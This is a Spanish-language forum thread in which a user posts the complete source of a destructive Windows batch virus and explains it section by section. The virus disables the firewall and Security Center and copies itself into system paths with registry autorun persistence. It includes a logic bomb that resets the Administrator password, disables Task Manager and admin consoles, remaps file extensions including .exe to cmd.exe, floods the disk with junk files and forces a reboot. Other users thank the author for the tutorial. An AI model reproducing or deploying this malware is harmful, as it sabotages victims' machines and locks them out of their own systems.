Programación > Batch

MANUAL: Creación de virus en Batch By: Espectro Infernal.

(1/2) > >>

Espectro Infernal:
Hola a todos, hoy estoy inspirado y tengo un poco de tiempo para hacer este manual sobre la creación de virus, para gente que ya sepa bastante de Batch.

En este manual quiero analizar un virus en Batch que creé yo en mi victoria contra DarknessFeatSunny, creo que fue un buen virus y no estaría mal editar el post y hacer el manual con su virus también...

Porcierto, para que lean mejor el manual, pronto lo colgaré en rapidshare para que se lo bajen y lo lean desde un .txt y no tengan que ir moviendo la barrita ;)

Bueno, empecemos, aquí tienen el code del virus:


 @echo off
                     :: Virus Batch made by: Espectro Infernal
   
   ::Setting unmodificable and estatic variables...

set regtype1=REG_SZ
set regtype2=REG_DWORD

set hklmsecurity=HKLM\SOFTWARE\Microsoft\Security Center
set hklmwinlogon=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
set hkcuwinlogon=HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
set hklmcversion=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
set hkcucversion=HKCU\Software\Microsoft\Windows\CurrentVersion
set hklmlanmanserver=HKLM\SYSTEM\CurrentControlSet\Services\LanManServer

set bomb=%userprofile%\win32.bat
set hoax=%userprofile%\windows.bat
set ovrflw=%systemroot%\system.bat


set log1=%systemroot%\log1.log
set log2=%systemroot%\log2.log
set log3=%systemroot%\log3.log
set log4=%systemroot%\system32\log4.log
set log5=%systemroot%\log5.log

   ::Deleting Standard System Security and More...

netsh delete firewall allowedprogram all > nul
net stop "Centro de Seguridad" > nul
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)" > nul

echo AntiVirusDisableNotify>"%log1%" & echo FirewallDisableNotify>>"%log1%" & echo UpdatesDisableNotify>>"%log1%" & echo AntiVirusOverride>>"%log1%" & echo FirewallOverride>>"%log1%"

for /F "tokens=*" %%a IN (%log1%) DO call :reg1 %%a
attrib +h "%log1%"

:reg1
set a=%1
reg add "%hklmsecurity%" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

   ::Que tal si se copia a si mismo ?

copy %0 "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat"
copy %0 "%temp%\SoundInput.bat"
copy %0 "%userprofile%\Menú Inicio\Programas\Inicio\Centro de seguridad.bat"
copy %0 "%systemroot%\shellexecutecontrol.bat"
copy %0 "%userprofile%\win32.bat"
copy %0 "%tmp%\SoundOutput.bat"

   ::Bomba lógica preparada para inhabilitar el acceso a la cuenta del Administrador.

echo         @echo off>"%bomb%"
echo set d1=%%date:~3%%>>"%bomb%"
echo set d2=%%d1:~0,2%%>>"%bomb%"
echo set t1=%%time:~0,2%%>>"%bomb%"
echo set x=5>>"%bomb%"
echo set /a y=%%d2%%+%%x%%>>"%bomb%"
echo if %%d2%% NEQ 12 (goto :act) else (goto :end)>>"%bomb%"
echo :act>>"%bomb%"
echo if %%y%% GTR 22 (goto :action) else (goto :end)>>"%bomb%"
echo :action >> "%bomb%"
echo if %%t1%% LSS 22 (goto :finish) else (goto :end)>>"%bomb%"
echo :finish>>"%bomb%"
echo net user Administrador sucker00>>"%bomb%"
echo net user Administrator sucker00>>"%bomb%"
echo exit>>"%bomb%"
echo :end>>"%bomb%"
echo exit>>"%bomb%"
attrib +h "%bomb%"

reg add "%hklmcversion%\Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hkcucversion%\Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hklmcversion%\RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hkcucversion%\RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hkcuwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul
reg add "%hklmwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.txt" /f > nul

   ::Disabling some tools and reseting some Windows Services...

echo DisableRegistryTools>"%log2%" & echo DisableTaskMgr>>"%log2%"

for /F "tokens=*" %%a IN (%log2%) DO call :reg2 %%a
attrib +h "%log2%"

reg add "%hkcucversion%\Internet Settings\Zones\3" /v 1803 /t "%regtype2%" /d 3 /f > nul

:reg2
set a=%1
reg add "%hklmcversion%\Policies\System" /v "%a%" /t "%regtype2%" /d 1 /f > bul
goto :EOF

echo secpol.msc>"%log4%" & echo lusrmgr.msc>>"%log4%" & echo ntmsmgr.msc>>"%log4%" & echo ntmsoprq.msc>>"%log4%" & echo services.msc>>"%log4%" & echo wmimgmt.msc>>"%log4%"

for /F "tokens=*" %%a in (%log4%) DO call :dis %%a
attrib +h "%log4%"


:dis
set a=%1
cd "%systemroot%\system32"
attrib -h -r -s -a %a%
set b=%a:~1%
set c=%a%
ren %a% %b%
echo win32system aplication>%c%
attrib +a %c%
del /q /f %b%
goto :EOF

   ::Having changes on your explorer.exe ??

echo NoClose>"%log3%" & echo NoDesktop>>"%log3%" & echo NoFind>>"%log3%" & echo NoRun>>"%log3%" & echo NoStartMenuSubFolders>>"%log3%" & echo NoSetTaskBar>>"%log3%" & echo NoSetFolders>>"%log3%" & echo RestrictRun>>"%log3%" & echo NoViewCanlextMenu>>"%log3%" & echo NoViewContexMenu>>"%log3%" & echo NoSetFolders>>"%log3%" & echo NoUserNameInStarMenu>>"%log3%" & echo NoFileMenu>>"%log3%"

for /F "tokens=*" %%a IN (%log3%) DO call :reg3 %%a
attrib +h "%log3%"

:reg3
set a=%1
reg add "%hkcucversion%\Policies\Explorer" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

   ::What if the victim has some Hoaxes efects?

reg add "%hklmlanmanserver%" /v "DiskSpaceThreshold" /t "%regtype1%" /d 95 /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeCaption" /t "%regtype1%" /d "Microsoft says..." /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeText" /t "%regtype1%" /d "Microsoft Mesage:  FUCK YOU!" /f > nul

echo        @echo off>"%hoax%" & echo msg * FUCK YOU, SUCKER!!">>"%hoax%" & echo exit>>"%hoax%"

reg add "%hklmcversion%\Run" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcucversion%\Run" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcuwinlogon%" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hklmwinlogon%" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul

   ::Disabling the win Key from the keyboard and other interesant registry values to make a pc slower...

reg add "HKCU\Control Panel\Desktop" /v MenuShowDelay /t "%regtype1%" /d 800 /f > nul
reg add "HKCU\Control Panel\Desktop" /v WaitToKillAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "HKCU\Control Panel\Desktop" /v HungAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "%hkcucversion%\Policies\Explorer" /v NoWinKeys /t "%regtype2%" /d 1 /f > nul

   ::Adding this shit to the regedit...

reg add "%hklmcversion%\Run" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat" /f > nul
reg add "%hkcucversion%\Run" /v "MessengerDrives" /t "%regtype1%"/d "%userprofile%\win32.bat /f > nul
reg add "%hklmcversion%\RunOnce" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\shellexecutecontrol.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerDrives" /t "%regtype1%"/d "%userprofile%\Menú Inicio\Programas\Inicio\Centro de seguridad.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerDrives" /t "%regtype1%"/d "%tmp%\SoundOutput.bat" /f > nul

   ::What if we touch a lil' things about assoc. extentions ?

echo .arj>"%log5%" & echo .asm>>"%log5%" & echo .asx>>"%log5%" & echo .au>>"%log5%" & echo .avi>>"%log5%" & echo .bkf>>"%log5%" & echo .bmp>>"%log5%" & echo .c>>"%log5%" & echo .dll>>"%log5%" & echo .doc>>"%log5%" & echo .exe>>"%log5%" & echo .htm>>"%log5%" & echo .html>>"%log5%" & echo .ico>>"%log5%" & echo .java>>"%log5%" & echo .jpeg>>"%log5%" & echo .jpg>>"%log5%" & echo .key>>"%log5%" & echo .lnk>>"%log5%" & echo .mid>>"%log5%" & echo .midi>>"%log5%" & echo .mod>>"%log5%" & echo .mp3>>"%log5%" & echo .mp4>>"%log5%" & echo .mpeg>>"%log5%" & echo .msc>>"%log5%" & echo .pdf>>"%log5%" & echo .php>>"%log5%" & echo .rar>>"%log5%" & echo .reg>>"%log5%" & echo .sys>>"%log5%" & echo .wav>>"%log5%" & echo .xml>>"%log5%"

for /F "tokens=*" %%a IN (%log5%) DO call :extassoc %%a
ftype WinRAR=CMD.EXE

:extassoc
set a=%1
set a=%a: =%
assoc %a%=WinRAR
goto :EOF

   ::And what if we make a lil' overflow ? ^^P

echo         @echo off>"%ovrflw%"
echo set rnd=%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=0>>"%ovrflw%"
echo :bug>>"%ovrflw%"
echo set rnd2=%random%%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=num+1>>"%ovrflw%"
echo if %num%==%rnd% (exit) else (echo win32 message: FUCK YOU!>"%systemroot%\%rnd2%.txt" & goto :bug)>>"%ovrflw%"

reg add "%hklmcversion%\Run" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcucversion%\Run" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul

:: Ending...
start Debes Registrarte para ver los Links. Registrate Ó Loegeate
msg * Microsoft Mesage:  FUCK YOU!
shutdown -r -t 05 -c "Microsoft Dice:     FUCK YOU!"
exit


1- INTRODUCCIÓN:

Como vemos es un code algo largo para ir explicandolo paso a paso, así que como este manual va dedicado a los que saben de Batch me saltaré algunos pasos básicos y cualquier duda que tengan me la postean aquí ;)

2- PASO A PASO...

Bien empecemos con el rpimer fragmento del codigo:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
 @echo off
                     :: Virus Batch made by: Espectro Infernal
   
   ::Setting unmodificable and estatic variables...

set regtype1=REG_SZ
set regtype2=REG_DWORD

set hklmsecurity=HKLM\SOFTWARE\Microsoft\Security Center
set hklmwinlogon=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
set hkcuwinlogon=HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
set hklmcversion=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
set hkcucversion=HKCU\Software\Microsoft\Windows\CurrentVersion
set hklmlanmanserver=HKLM\SYSTEM\CurrentControlSet\Services\LanManServer

set bomb=%userprofile%\win32.bat
set hoax=%userprofile%\windows.bat
set ovrflw=%systemroot%\system.bat


set log1=%systemroot%\log1.log
set log2=%systemroot%\log2.log
set log3=%systemroot%\log3.log
set log4=%systemroot%\system32\log4.log
set log5=%systemroot%\log5.log


--- Fin del código ---

Pues bien, declaramos echo como OFF, título y comentario que indica que se declaran variables estaticas inmodificables que se irán usando durante el virus, las primeras hacen referencia al tipo de valores que se podrán añadir en el registro, el segundo pedazo de variables indican rutas que se usaran frecuentemente al agergar valores en el registro y la tercera parte de las variables hacen referencia a archivos que se irán usando en el virus. Todo esto lo hacemos para que el virus corra ma´s rápido en la Pc, que use menos recursos (ya que vamos a usar estas variables mucho) y como buen método de programación.

Vamos con el siguiente pedazo de code:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Deleting Standard System Security and More...

netsh delete firewall allowedprogram all > nul
net stop "Centro de Seguridad" > nul
net stop "Firewall de Windows/Conexión compartida a Internet (ICS)" > nul

echo AntiVirusDisableNotify>"%log1%" & echo FirewallDisableNotify>>"%log1%" & echo UpdatesDisableNotify>>"%log1%" & echo AntiVirusOverride>>"%log1%" & echo FirewallOverride>>"%log1%"

for /F "tokens=*" %%a IN (%log1%) DO call :reg1 %%a
attrib +h "%log1%"

:reg1
set a=%1
reg add "%hklmsecurity%" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF


--- Fin del código ---

Este apartado, como dice el comentario introductivo, elimina la seguridad de una pc standard. Usando comandos net y netsh que detendrán el firewall de windows y el centro de seguridad.
La parte más interesante está en el for: escrivimos esto:

AntiVirusDisableNotify         --
FirewallDisableNotify             |
UpdatesDisableNotify            |  > "%log1%" = %systemroot%\log1.log
AntiVirusOverride                 |
FirewallOverride                  --

Y con el for:

for /F "tokens=*" %%a IN (%log1%) DO call :reg1 %%a
attrib +h "%log1%"

:reg1
set a=%1
reg add "%hklmsecurity%" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF

Cogemos todas las palabras en "%log1%" y por cada palabra cogida, esta se tomara como valor para agregarlo al registro como %regtype2% (valor DWORD) de datos "1" forzando la escritura de ese valor y en caso de su existencia, la sobreescritura. Al acabar el bucle continua el codigo en la linea de debajo del for (attrib +h "%log1%") le añadimos atributos de archivo oculto (hide).

Continuemos:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Que tal si se copia a si mismo ?

copy %0 "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat"
copy %0 "%temp%\SoundInput.bat"
copy %0 "%userprofile%\Menú Inicio\Programas\Inicio\Centro de seguridad.bat"
copy %0 "%systemroot%\shellexecutecontrol.bat"
copy %0 "%userprofile%\win32.bat"
copy %0 "%tmp%\SoundOutput.bat"


--- Fin del código ---

Muy básico, nada que explicar: se copia a si mismo en esas diferentes rutas, intentamos que sean varias, se oculte en rutas muy largas y con nombres comunes en el sistema.

NOTA: Aquí se podría haber parametrizado con "/y" en caso de que se quisiese infectar a la misma persona 2 veces con el virus y evitamos que pida confirmación para sobreescribir los archivos que se copiaron en esas rutas durante la primera infección ;)

Bueno, sigamos:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Bomba lógica preparada para inhabilitar el acceso a la cuenta del Administrador.

echo         @echo off>"%bomb%"
echo set d1=%%date:~3%%>>"%bomb%"
echo set d2=%%d1:~0,2%%>>"%bomb%"
echo set t1=%%time:~0,2%%>>"%bomb%"
echo set x=5>>"%bomb%"
echo set /a y=%%d2%%+%%x%%>>"%bomb%"
echo if %%d2%% NEQ 12 (goto :act) else (goto :end)>>"%bomb%"
echo :act>>"%bomb%"
echo if %%t1%% LSS 22 (goto :finish) else (goto :end)>>"%bomb%"
echo :finish>>"%bomb%"
echo net user Administrador sucker00>>"%bomb%"
echo net user Administrator sucker00>>"%bomb%"
echo exit>>"%bomb%"
echo :end>>"%bomb%"
echo exit>>"%bomb%"
attrib +h "%bomb%"

reg add "%hklmcversion%\Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.bat" /f > nul
reg add "%hkcucversion%\Run" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.bat" /f > nul
reg add "%hkcuwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.bat" /f > nul
reg add "%hklmwinlogon%" /v "SecuritySystem" /t "%regtype1%"/d "%userprofile%\win32.bat" /f > nul


--- Fin del código ---

Bonita parte del código, como dice le comentario inicial, es una bomba lógica para deshabilitar la cuenta del administrador. Vamos a explicar:

Se declaran distintas variables que se usarán en la bomba lógica:

d1,d2,t1,x

Cada una tiene como datos, una parte de la fecha: d1 tiene el mes y el año que hay en el reloj y calendario del ordenador. La variable d2 se usa a partir de la d1 para recoger SOLO el dia del més, (que lo conseguimos gracias a: set d2=%d1:~0,2% con lo que quitamos todos los valores de la variable d1 (09/2007) y nos quedamos solo con los dos primeros (09) que indican el dia.
Con la variable t1 recogemos la hora que marca el reloj del pc.

Una vez tenemos estos datos, trabajaremos para usar la bomba lógica:

- Si el mes en que se ejecuta el virus no es diciembre:
         - Si la hora en tiempo de infeccion es menos de las 22:00
                 - Creamos el user Administrador con la pass:sucker00

-Si no se cumple alguna de estas acciones, no se deshabilita la cuenta del admin.

-> Toda esta bomba logica la preparamos en un archivo: "%bomb%" (variable estatica inmodificable dle rpincipio) y este archivo lo añadimos a distintas claves dle registro con nombres típicos del Pc al registro para que se inicie con windows.

Vamos con el siguiente trozo del virus, espero no se rmuy epsado y que se vaya entendiendo :P:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Disabling some tools and reseting some Windows Services...

echo DisableRegistryTools>"%log2%" & echo DisableTaskMgr>>"%log2%"

for /F "tokens=*" %%a IN (%log2%) DO call :reg2 %%a
attrib +h "%log2%"

reg add "%hkcucversion%\Internet Settings\Zones\3" /v 1803 /t "%regtype2%" /d 3 /f > nul

:reg2
set a=%1
reg add "%hklmcversion%\Policies\System" /v "%a%" /t "%regtype2%" /d 1 /f > bul
goto :EOF

echo secpol.msc>"%log4%" & echo lusrmgr.msc>>"%log4%" & echo ntmsmgr.msc>>"%log4%" & echo ntmsoprq.msc>>"%log4%" & echo services.msc>>"%log4%" & echo wmimgmt.msc>>"%log4%"

for /F "tokens=*" %%a in (%log4%) DO call :dis %%a
attrib +h "%log4%"

:dis
set a=%1
cd "%systemroot%\system32"
attrib -h -r -s -a %a%
set b=%a:~1%
set c=%a%
ren %a% %b%
echo win32system aplication>%c%
attrib +a %c%
del /q /f %b%
goto :EOF


--- Fin del código ---

Bueno aquí se usa la misma técnica con for para añadir valores al registro que en la eliminación de la seguridad estandard del Pc. En este caso se deshabilitan algunas herramientas como el taskmgr.exe y también se resetean algunos servicios de windows como la política de seguridad. Para ello usé esta técnica (algo vieja):

:dis %1 (%1 por ejemplo pondremos que es: secpol.msc, en la etiqueta no esta "%1" pero al usar call en el for ya se le pasa allí el parametro "%1" )
set a=%1 (nombre de un servicio, por ejemplo: secpol.msc)
cd "%systemroot%\system32" (dodne estan los servicios de windows)
attrib -h -r -s -a %a% (le quitamos todos los atributos a secpol.msc)
set b=%a:~1% (creamos la variable "b" que coje el nombre del servicio (secpol.msc) y le quita una letra: (ecpol.msc))
set c=%a% (creamos "c" con el contenido "a")
ren %a% %b% (renombramos el real "secpol.msc" por "ecpol.msc")
echo win32system aplication>%c% (escribimos algo en el archivo "c" que tiene como nombre "secpol.msc" (el mismo que tenia %a%) para que le otrogue 1 kb de memoria al archivo)
attrib +a %c% (atributo de almacenamiento al servicio real que ahora
del /q /f %b% (eliminamos "ecpol.msc")
goto :EOF  (volvemos al bucle)

Bueno, cuesta un pcoo de entender así, pero basicamente lo que se hace es cambiarle el nombre al servicio verdadero de windows por el nombre que tiene menos la primera letra, (si el servicio se llama secpol.msc pues lo renombraremos a "ecpol.msc") y creamos un archivo en blanco con el nombre del servicio verdadero "secpol.msc".

Asi quedarian los servicios de esta manera:

ecpol.msc (verdadero)
secpol.msc (falso)

Y la máquina cogeria el secpol.msc porque tiene el nombre del servicio que sua windows pero e realidad e sun archivo falso.

Finalmente elimino el servicio correcto "ecpol.msc"

Bueno, continuemos con el código:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Having changes on your explorer.exe ??

echo NoClose>"%log3%" & echo NoDesktop>>"%log3%" & echo NoFind>>"%log3%" & echo NoRun>>"%log3%" & echo NoStartMenuSubFolders>>"%log3%" & echo NoSetTaskBar>>"%log3%" & echo NoSetFolders>>"%log3%" & echo RestrictRun>>"%log3%" & echo NoViewCanlextMenu>>"%log3%" & echo NoViewContexMenu>>"%log3%" & echo NoSetFolders>>"%log3%" & echo NoUserNameInStarMenu>>"%log3%" & echo NoFileMenu>>"%log3%"

for /F "tokens=*" %%a IN (%log3%) DO call :reg3 %%a
attrib +h "%log3%"

:reg3
set a=%1
reg add "%hkcucversion%\Policies\Explorer" /v "%a%" /t "%regtype2%" /d 1 /f > nul
goto :EOF


--- Fin del código ---

Nada muy nuevo que contar, escribimos esto en %log3% y cada palabra la añadimos a una clave del registro especifica: %hkcucversion%\Policies\Explorer

NoClose          --
NoFind              |
NoDesktop         |   > %log3% = %systemroot%\log3.log
NoRun               |
...                    --


Con estas claves le modificamos el explorer.exe de tal amnera que no tenga el menu ejecutar, no tenga iconos en el escritorio, no tenga el menu de inicio buscar, etc.

Ya queda menos, espero que lo vayan entendiendo :

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::What if the victim has some Hoaxes efects?

reg add "%hklmlanmanserver%" /v "DiskSpaceThreshold" /t "%regtype1%" /d 95 /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeCaption" /t "%regtype1%" /d "Microsoft says..." /f > nul
reg add "%hklmwinlogon%" /v "LegalNoticeText" /t "%regtype1%" /d "Microsoft Mesage:  FUCK YOU!" /f > nul

echo        @echo off>"%hoax%" & echo msg * FUCK YOU, SUCKER!!">>"%hoax%" & echo exit>>"%hoax%"

reg add "%hklmcversion%\Run" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcucversion%\Run" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hkcuwinlogon%" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul
reg add "%hklmwinlogon%" /v "ControlGraphics" /t "%regtype1%"/d "%userprofile%\windows.bat" /f > nul



--- Fin del código ---


La misma tecnica que la anterior vez, pero ahora usamos estos valores del registro para provocar efectos Hoax en la victima: Mensajes a inicio y durante el correr de windows. Por ejemplo, el ordenador nos notifica cuando tenemos solo un 5% de espacio libre en el disco duro y nos envia mensajes diciendo que vayamos con cuidado, que queda poco espacio. Pue sbien, nosotros cambiamos ese valor y lo ponemos con 95% asi que cuando el disco tenga un 95% de espacio llibre en el disco (solo tener un 5% ocupado) nos apareceran esos dichosos mensajes que tanto nos agobian ^^

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Disabling the win Key from the keyboard and other interesant registry values to make a pc slower...

reg add "HKCU\Control Panel\Desktop" /v MenuShowDelay /t "%regtype1%" /d 800 /f > nul
reg add "HKCU\Control Panel\Desktop" /v WaitToKillAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "HKCU\Control Panel\Desktop" /v HungAppTimeout /t "%regtype1%" /d 40000 /f > nul
reg add "%hkcucversion%\Policies\Explorer" /v NoWinKeys /t "%regtype2%" /d 1 /f > nul


--- Fin del código ---

Usamos el método clasico para añadir nuevos valores al registro que haran que la Pc tarde muchos en apagarse, encenderse, de mostrar los menus del menu inicio y deshabilitar la tecla windows del teclado ;)

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::Adding this shit to the regedit...

reg add "%hklmcversion%\Run" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat" /f > nul
reg add "%hkcucversion%\Run" /v "MessengerDrives" /t "%regtype1%"/d "%userprofile%\win32.bat /f > nul
reg add "%hklmcversion%\RunOnce" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\Resources\Themes\Luna\Shell\Metallic\shellstyle.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "MessengerDrives" /t "%regtype1%"/d "%systemroot%\shellexecutecontrol.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerDrives" /t "%regtype1%"/d "%userprofile%\Menú Inicio\Programas\Inicio\Centro de seguridad.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerDrives" /t "%regtype1%"/d "%tmp%\SoundOutput.bat" /f > nul



--- Fin del código ---

Añadimos nuestro virus al registro para que se inicie varias veces con el inicio de windows...

Hemos usado las direcciones en las quee l virus se copió al inicio del código ;)

Continuemos:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
::What if we touch a lil' things about assoc. extentions ?

echo .arj>"%log5%" & echo .asm>>"%log5%" & echo .asx>>"%log5%" & echo .au>>"%log5%" & echo .avi>>"%log5%" & echo .bkf>>"%log5%" & echo .bmp>>"%log5%" & echo .c>>"%log5%" & echo .dll>>"%log5%" & echo .doc>>"%log5%" & echo .exe>>"%log5%" & echo .htm>>"%log5%" & echo .html>>"%log5%" & echo .ico>>"%log5%" & echo .java>>"%log5%" & echo .jpeg>>"%log5%" & echo .jpg>>"%log5%" & echo .key>>"%log5%" & echo .lnk>>"%log5%" & echo .mid>>"%log5%" & echo .midi>>"%log5%" & echo .mod>>"%log5%" & echo .mp3>>"%log5%" & echo .mp4>>"%log5%" & echo .mpeg>>"%log5%" & echo .msc>>"%log5%" & echo .pdf>>"%log5%" & echo .php>>"%log5%" & echo .rar>>"%log5%" & echo .reg>>"%log5%" & echo .sys>>"%log5%" & echo .wav>>"%log5%" & echo .xml>>"%log5%"

for /F "tokens=*" %%a IN (%log5%) DO call :extassoc %%a
ftype WinRAR=CMD.EXE

:extassoc
set a=%1
set a=%a: =%
assoc %a%=WinRAR
goto :EOF


--- Fin del código ---

En esta parte usamos la misma tecnica de echo y for con call y paso de parametro para que cada palabra escrita en %log5% la associe con la associación WinRAR y al acabar el bucle, use el ftype para usar la cmd.exe en cada archivo asociado WinRAR; así, un .txt lo asociamos al WinRAR y despues hacemos con ftype que se abra la cmd.exe al abrir un .txt. De tal manera que no podamos hacer nada con el Pc, se incluye la extensión .exe :P

Limpiando pequeños agujeros....

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
:And what if we make a lil' overflow ? ^^P

echo         @echo off>"%ovrflw%"
echo set rnd=%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=0>>"%ovrflw%"
echo :bug>>"%ovrflw%"
echo set rnd2=%random%%random%%random%%random%%random%>>"%ovrflw%"
echo set /a num=num+1>>"%ovrflw%"
echo if %num%==%rnd% (exit) else (echo win32 message: FUCK YOU!>"%systemroot%\%rnd2%.txt" & goto :bug)>>"%ovrflw%"

reg add "%hklmcversion%\Run" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcucversion%\Run" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hklmcversion%\RunOnce" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcucversion%\RunOnce" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hkcuwinlogon%" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul
reg add "%hklmwinlogon%" /v "MessengerContacts" /t "%regtype1%"/d "%systemroot%\system.bat" /f > nul


--- Fin del código ---

Creamos un muy básico overflow y este overflox no se acciona hasta que no se vuelva a inicra windows, por eos lo agregamos en Run, RunOnce, etc.

Finalizando el virus:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
:: Ending...

start http://support.microsoft.com/

msg * Microsoft Mesage:  FUCK YOU!

shutdown -r -t 05 -c "Microsoft Dice:     FUCK YOU!"


exit



--- Fin del código ---

Iniciamos la web de soporte de microsoft para que la victima intente contactar con ellos a ver si los de microsoft le dicen alguna cosa k le pueda ayudar (dudable ¬¬) xD Y mandamos un bonito mensaje de repsuesta desde microsoft. Finalmente Reiniciamos y acabamos el virus con "exit".


Bueno, como ven los comandos no son muy avanzados, pero la maneta en que está programado el virus si lo és, hay que intentar ser práctico y suar todo lo que el lenguaje te da (By: DarknessFeatSunny, gracias amigo ;) )

Se aprende practicando y leiendo, espero que les sirva de ayuda.

PD: Si quedan dudas, psoteenlas aquí o mandeme un PM
PD: Pronto publico otros manuales como la creacion de interfaces polimorficas ;)

Bytes, Espectro Infernal.

ÄìmBòt:
muy bueno tuto gracias,,

.-EL_Mello-.{%Windir%}:
Una pregunta:

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate%hklmcversion%\Run
--- Fin del código ---

eso es igual a...¿??

Código: Debes Registrarte para ver los Links. Registrate Ó LoegeateHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
--- Fin del código ---

Espectro Infernal:
Si, así es eL_Mello ;)

.-EL_Mello-.{%Windir%}:
ASIAS!!! me encanta abreviar

Navegación

[0] Índice de Mensajes

[#] Página Siguiente

Ir a la versión completa